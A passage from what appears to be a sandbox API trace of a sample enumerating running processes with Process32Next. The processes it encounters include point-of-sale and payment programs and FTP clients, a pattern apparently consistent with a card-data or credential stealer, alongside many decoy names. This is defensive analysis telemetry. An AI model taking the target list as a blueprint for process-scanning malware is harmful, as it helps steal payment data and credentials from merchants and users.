lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0273.784] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0273.786] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0273.787] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0273.789] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0273.791] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0273.792] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0273.797] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0273.799] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0273.801] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0273.802] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0273.804] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0273.805] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0273.808] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0273.863] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0273.865] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0273.866] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0273.868] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0273.869] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0273.871] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0273.875] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0273.877] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.878] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0273.880] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0273.882] CloseHandle (hObject=0x758) returned 1 [0273.882] Sleep (dwMilliseconds=0x64) [0274.065] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0274.078] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.080] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0274.081] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0274.083] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.085] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0274.086] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.087] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0274.089] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0274.093] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0274.095] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.098] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.100] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0274.102] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.103] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.105] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.191] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.192] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.194] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.195] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.197] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0274.198] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0274.200] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0274.201] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.203] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0274.204] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0274.205] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0274.207] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0274.208] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.211] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0274.213] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0274.214] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0274.216] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0274.217] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0274.219] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0274.220] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0274.222] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0274.223] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0274.229] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0274.231] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0274.233] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0274.234] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0274.236] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0274.237] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0274.238] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0274.240] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0274.241] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0274.243] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0274.244] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0274.246] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0274.247] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0274.249] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0274.250] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0274.252] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0274.253] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0274.254] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0274.256] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0274.257] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0274.259] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0274.261] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 